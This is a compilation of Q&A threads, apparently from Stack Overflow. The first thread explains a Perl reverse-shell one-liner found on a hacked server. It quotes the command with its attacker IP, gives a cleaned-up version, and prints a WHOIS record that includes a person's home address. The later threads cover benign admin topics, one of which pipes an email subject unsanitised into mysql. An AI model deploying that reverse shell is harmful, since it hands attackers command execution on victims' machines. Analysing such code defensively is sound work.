My server got hacked, and ps aux shows that it's running this program now:
perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET (PeerAddr,"169.50.9.58:1212");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
I don't know Perl...what is this program doing?
It opens a socket to that IP. Then it sets up the STDIN to read from it and the STDOUT to go to it. So it builds a direct communication channel between the process and that IP.
Then it goes into a while loop in which it runs via system whatever comes through STDIN.
It does this in a forked process, fire-and-forget (detached) style, where the parent exits right away. So this executes and exits and there is another process that talks with that IP and runs commands.
Short answer:
system$_ while<>;
basically means "as long as there is input, execute the commands you get."
If I run nc -l -p 1212 on my machine, and then you run this script on your machine, then you open a connection to me where I can issue commands that your machine will run.
That Perl code is equivalent to this
You have already been told what it does; it's clearly malicious
use IO;
$p = fork;
exit, if ( $p );
$c = IO::Socket::INET->new( PeerAddr => "169.50.9.58:1212" );
STDIN->fdopen( $c, 'r' );
$~->fdopen( $c, 'w' );
system $_ while <>;
Here's the result of querying whois.com for that IP address. You may want to send an email to the "abuse" address
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '169.50.9.32 - 169.50.9.63'
% Abuse contact for '169.50.9.32 - 169.50.9.63' is 'email#softlayer.com'
inetnum: 169.50.9.32 - 169.50.9.63
netname: NETBLK-SOFTLAYER-RIPE-CUST-JS17702-RIPE
descr: VidScale, Inc
country: US
admin-c: JS17702-RIPE
tech-c: JS17702-RIPE
status: LEGACY
mnt-by: MAINT-SOFTLAYER-RIPE
created: 2016-01-09T01:24:25Z
last-modified: 2016-01-09T01:24:25Z
source: RIPE
person: John Scharber
address: 4406 Whistling Wind Way
address: Placerville, CA 95667 US
phone: +1.866.398.7638
nic-hdl: JS17702-RIPE
abuse-mailbox: email#vidscale.com
mnt-by: MAINT-SOFTLAYER-RIPE
created: 2016-01-09T01:24:23Z
last-modified: 2016-01-09T01:24:23Z
source: RIPE
% This query was served by the RIPE Database Query Service version 1.88.1 (BLAARKOP)
The other answers already adequately answer how this back door works. Just to recap, it allows an unprivileged user access to the system without authenticating. You only need to know which port number to connect to in order to run arbitrary programs on the computer.
The reason this is "nefarious" is that it bypasses authentication. If it required you to log in with a valid user name and password, it would not be much different from a basic telnet server. (Granted, those are bad too; in today's world you would absolutely require encrypted authenticated access, i.e. ssh or similar.)
A user who already has legitimate login access to your system has no need to run a program like this. They already have ssh access or similar.
The reason intruders install such programs is often that it allows them to pivot from a simple vulnerability (like a simple "Bobby Tables" SQL injection) which only allows them to run a single command. Now they have interactive access and can conveniently run many commands without using (and potentially exposing) the original exploit again; from here, they can probably figure out a way to pivot further on to a privileged account (i.e. root), or initiate lateral movement to other systems within your perimeter.
Related
SQL Server has a cool feature in sp_send_dbmail (quick guide here) that lets you email out reports. Does anything like that exist in Postgres? My postgres is hosted at Heroku so I can share a dataclip, but I am wondering if there's an easy way to schedule emails to send out reports.
You can use pgMail to send mail from within PostgreSQL.
Prerequisites:
Before you can use pgMail, you must install the TCL/u procedural language. TCL/u is an UNRESTRICTED version of TCL that your database can use in its stored functions. Before you go nuts installing the unrestricted TCL procedural language in all of your databases, take into account that you must prepare adequate security precautions when adding the TCL/u language to your database! I will not be responsible for misconfigured servers allowing dangerous users to do bad things!
To install the TCL/u procedural language, you must have compiled (or used binary packages) and installed the TCL extensions of PostgreSQL. Once you are sure this has been completed, simply type the following at the unix shell prompt as a database administrator.
# createlang pltclu [YOUR DATABASE NAME]
In the place of [YOUR DATABASE NAME], put the name of the database to which you will be adding the stored procedure. If you want it to be added to all NEW databases, use "template1" as your database name.
Before adding new procedure to the DB first do:
Replace the text <ENTER YOUR MAILSERVER HERE> with the fully qualified domain name for your mailserver. i.e., mail.server.com.
Replace the text <ENTER YOUR DATABASESERVER HERE> with the fully qualified domain name for your database server. i.e., db.server.com.
Once you have done the above, you are ready to go.
After this step, use the psql interface to add the pgMail function. Just copy the contents of the pgmail.sql file and paste it into your window. You may also load it directly from the command line by typing:
# psql -e [YOUR DATABASE NAME] < pgMail.sql
Once you have installed the stored function, simply call the procedure as follows.
select pgmail('Send From ','Send To ','Subject goes here','Plaintext message body here.');
select pgmail('Send From ','Send To ','Subject goes here','','HTML message body here.');
Or now, multipart MIME!
select pgmail('Send From ','Send To ', 'Subject goes here','Plaintext message body here.', 'HTML message body here.');
In both the "Send From" and "Send To" fields, you may include either only the email, or the email enclosed in <> with a plaintext name.
Testing Your Install
I have included an example for you to try. You MUST FIRST replace the string in the example.execute.sql script with your real email address, and install the plpgsql language just like you did the pltclu above. You can do that by entering a createlang [YOUR DATABASE NAME] plpgsql.
Once that is complete, first run the example.setup.sql. Then execute the example.execute.sql script. Provided everything is working well, you will see 2 emails in your mailbox. To remove this example, execute the example.cleanup.sql script.
SMTP Auth
pgMail does not support SMTP Auth. Most of the folks that use it either set up a local mailserver on the database server for local queueing and then use that setup for any relaying required (with auth). Or, alternatively, there is usually a special rule made in the the /etc/mail/access (or equivalent) file to allow relaying from that IP used by the database server. Obviously, the latter option doesn't work with GMail.
Part of the reasoning behind this is that auth will be problematic in the transactional nature of pgMail for big jobs. The ideal solution would be to drop an EXIM server on the database server and have that handle any type of authentication as a smart relay server. Here is a link that has more info on how to set SMTP server up.
Documentation: http://brandolabs.com/pgmail
You can also use py_pgmail from https://github.com/lcalisto/py_pgmail
Create py_pgmail function by running py_pgmail.sql
After the function is created you can simply call the function from anywhere in the database as:
select py_pgmail('sentFromEmail',
array['destination emails'],
array['cc'],
array['bcc'],
'Subject',
'<USERNAME>','<PASSWORD>',
'Text message','HTML message',
'<MAIL.MYSERVER.COM:PORT>')
array['cc'] and array['bcc'] can be empty arrays like array['']
tl;dr; How do I capture stderr from within a script to get a more specific error, rather than just relying on the generic error from Net::OpenSSH?
I have a tricky problem I'm trying to resolve. Net::OpenSSH only works with protocol version 2. However we have a number of devices of the network that only support version 1. I'm trying to find an elegant way of detecting if the remote end is the wrong version.
When connecting to a version 1 device, the following message shows up on the stderr
Protocol major versions differ: 2 vs. 1
However the error that is returned by Net::OpenSSH is as follows
unable to establish master SSH connection: bad password or master process exited unexpectedly
This particular error is too general,and doesn't address just a protocol version difference. I need to handle protocol differences by switching over to another library, I don't want to do that for every connection error.
We use a fairly complicated process that was originally wired for telnet only access. We load up a "comm" object, that then determines stuff like the type of router, etc. That comm object invokes Net::OpenSSH to pass in the commands.
Example:
my $sshHandle = eval { $commsObject->go($router) };
my $sshError = $sshHandle->{ssh}->error;
if ($sshError) {
$sshHandle->{connect_error} = $sshError;
return $sshHandle;
}
Where the protocol error shows up on stderr is here
$args->{ssh} = eval {
Net::OpenSSH->new(
$args->{node_name},
user => $args->{user},
password => $args->{tacacs},
timeout => $timeout,
master_opts => [ -o => "StrictHostKeyChecking=no" ]
);
};
What I would like to do is pass in the stderr protocol error instead of the generic error passed back by Net::OpenSSH. I would like to do this within the script, but I'm not sure how to capture stderr from within a script.
Any ideas would be appreciated.
Capture the master stderr stream and check it afterwards.
See here how to do it.
Another approach you can use is just to open a socket to the remote SSH server. The first thing it sends back is its version string. For instance:
$ nc localhost 22
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-8
^C
From that information you should be able to infer if the server supports SSH v2 or not.
Finally, if you also need to talk to SSH v1 servers, the development version of my other module Net::SSH::Any is able to do it using the OS native SSH client, though it establishes a new SSH connection for every command.
use Net::SSH::Any;
my $ssh = Net::SSH::Any->new($args->{node_name},
user => $args->{user},
password => $args->{tacacs},
timeout => $timeout,
backends => 'SSH_Cmd',
strict_host_key_checking => 0);
Update: In response to Bill comment below on the issue of sending multiple commands over the same session:
The problem of sending commands over the same session is that you have to talk to the remote shell and there isn't a way to do that reliably in a generic fashion as every shell do things differently, and specially for network equipment shells that are quite automation-unfriendly.
Anyway, there are several modules on CPAN trying to do that, implementing a handler for every kind of shell (or OS). For instance, check Oliver Gorwits's modules Net::CLI::Interact, Net::Appliance::Session and Net::Appliance::Phrasebook. The phrasebook approach seems quite suitable.
Warning: This is long and can probably only be answered by a professional perl programmer or someone involved with a domain registrar or registry company.
I run a website hosting, design, and domain registration business. We are a registrar for some TLDs and a couple of them require us to have a whois server for domains registered with us. I have a whois server set up which is working but I know it's not doing it the right way, so I'm trying to figure out what I need to change.
My script is set up so going to whois.xxxxxxxxxx.com via browser or doing whois -h whois.xxxxxxxxxx.com from shell works. A whois on a domain registered with us gives whois data and a domain not registered with us says it's not registered with us.
If needed, I can give the whois url, or it can be figured out from my profile. I just don't want to put it here to look like advertising or for search engines to end up going to.
The problem is how my script does it.
My whois url is set up in apache's httpd.conf file as a normal subdomain to listen on port 80, and it's also set up to listen on port 43. When called via browser, it works properly, gives a form to provide a domain and checks our database for that domain. How it works when called from shell is fine as well, but how it distinguishes between the 2 is weird, and how it gets the domain is also weird. It works, but it can't be the right way to do it.
How it distinguishes between shell and http is:
if ($ENV{REQUEST_METHOD} ne "GET") {
&shell_process;
}
else {
&http_process;
}
It would seem more logical for this to work:
if ($ENV{SERVER_PORT} eq 43) {
&shell_process;
}
else {
&http_process;
}
That doesn't work because even when called through port 43 as a whois request, the ENV vars are saying "SERVER_PORT = 80".
How it gets the domain name when called from shell is:
$domain = lc($ENV{REQUEST_METHOD});
You would think the domain would be the QUERY_STRING or more likely, in the ARGV vars, but it's not.
Here are the ENV vars (that matter) when called via http:
SERVER_NAME = whois.xxxxxxxxxxxxx.com
REQUEST_METHOD = GET
QUERY_STRING = domain=roughdraft.ws&submit=+Get+Whois+
SERVER_PORT = 80
REQUEST_URI = /index.cgi?domain=premierwebsitesolutions.ws&submit=+Get+Whois+
HTTP_HOST = whois.xxxxxxxxxxxxxx.com
Here are the ENV vars (that matter) when called via shell:
SERVER_NAME = whois.xxxxxxxxxxxxxx.com
REQUEST_METHOD = premierwebsitesolutions.ws
QUERY_STRING =
SERVER_PORT = 80
REQUEST_URI =
Notice the SERVER_PORT stays 80 either way, even though through shell it's set up on port 43.
Notice how via shell the REQUEST_METHOD is the domain being looked up.
I've done lots of searching and did find swhoisd: Simple Whois Daemon, but that's only for small databases. I also found the Daemon::Whois perl module, but it uses a cdb database which I know nothing about, it has no instructions to it, and it's a daemon which I don't really need because the script works fine when called through apache on port 43.
Does anyone know how this is supposed to be done?
Can I get the script to see that it was called via port 43?
Is it normal to use REQUEST_METHOD this way?
Is a whois server supposed to be running as a daemon?
Thanks for helping, or trying to.
Mike
WHOIS is not a HTTP-like protocol, so attempting to serve it through Apache on port 43 will not work correctly. You will need to write a separate daemon to serve WHOIS — if you don't want to use Daemon::Whois, you will probably at least want to use something like Net::Daemon to simplify things for you.
https://stackoverflow.com/a/933373/66519 states something could be set to detect cli vs web. It applies to php in this case. Based on the lack of answers here maybe it might help you get to something useful. Sorry for the formatting I am using the mobile SO app.
I try to execute this example script (https://oss.trac.surfsara.nl/pbs_python/wiki/TorqueUsage/Scripts/Submit)
#!/usr/bin/env python
import sys
sys.path.append('/usr/local/build_pbs/lib/python2.7/site-packages/pbs/')
import pbs
server_name = pbs.pbs_default()
c = pbs.pbs_connect(server_name)
attropl = pbs.new_attropl(4)
# Set the name of the job
#
attropl[0].name = pbs.ATTR_N
attropl[0].value = "test"
# Job is Rerunable
#
attropl[1].name = pbs.ATTR_r
attropl[1].value = 'y'
# Walltime
#
attropl[2].name = pbs.ATTR_l
attropl[2].resource = 'walltime'
attropl[2].value = '400'
# Nodes
#
attropl[3].name = pbs.ATTR_l
attropl[3].resource = 'nodes'
attropl[3].value = '1:ppn=4'
# A1.tsk is the job script filename
#
job_id = pbs.pbs_submit(c, attropl, "A1.tsk", 'batch', 'NULL')
e, e_txt = pbs.error()
if e:
print e,e_txt
print job_id
But shell shows error "15025 Queue already exists". With qsub job submits normally. I have one queue 'batch' on my server. Torque version - 4.2.7. Pbs_python version - 4.4.0.
What I should to do to start new job?
There are two things going on here. First there is an error in pbs_python that maps the 15025 error code to "Queue already exists". Looking at the source of torque we see that 15025 actually maps to the error "Bad UID for job execution", this means that on the torque server, the daemon cannot determine if the user you are submitting as is allowed to run jobs. This could be because of several things:
The user you are submitting as doesn't exist on the machine running pbs_server
The host you are submitting from is not in the "submit_hosts" parameter of the pbs_server.
Solution For 1
The remedy for this depends on how you authenticate users across systems, you could use /etc/hosts.equiv to specify users/hosts allowed to submit, this file would need to be distributed to all the torque nodes as well as the torque server machine. Using hosts.equiv is pretty insecure, I haven't actually used it in this. We use a central LDAP server to authenticate all users on the network and do not have this problem. You could also manually add the user to all the torque nodes and the torque server, taking care to make sure the UID is the same on all systems.
Solution For 2
If #1 is not your problem (which I doubt it is), you probably need to add the hostname of the machine you're submitting from to the "submit_hosts" parameter on the torque server. This can be accomplished with qmgr:
[root#torque_server ]# qmgr -c "set server submit_hosts += hostname.example.com"
The pbs python library that you are using was written for torque 2.4.x.
The internal api's for torque were largely rewritten in torque 4.0.x. The library will most likely need to be written for thew new API.
Currently the developers of torque do not test any external libraries. It is possible that they could break at any time.
I am looking fopointers on the best approach to process incoming emails to a certain vhost and to call an external script with the email data as parameters - basically to allow email to be sent to a certain "private" email address at a host which then auto inserts something into that sites database. I currently have exim set up as the mail handler.
You have to follow exim single file configurations structure. In routers section write your own custom router that will deliver email to your desired php script. In transport section write your own custom transport that will ensure delivery to the desired script using curl. Just write the following configurations in your /etc/exim.cnf file:
############ROUTERS
runscript:
driver = accept
transport = run_script
unseen
no_expn
no_verify
############TRANSPORT
run_script:
debug_print = "T: run_script for $local_part#$domain"
driver = pipe
command = /home/bin/curl http://my.domain.com/mailTest.php --data-urlencode $original_local_part#$original_domain
Where mailTest.php will be your destined script.
Procmail is a good generic answer. If your needs are very specific, you could hook in your own script directly from your .forward (or Exim's corresponding construct -- can't remember exactly how it differs), but oftentimes, wrapping your own script inside a simple .procmailrc helps you avoid a bunch of iffy details of email delivery, and concentrate on the actual processing.
:0
' ^Subject: secretpassword adduser \/[A-Z]+
| echo "insert $MATCH into users" | mysql -d users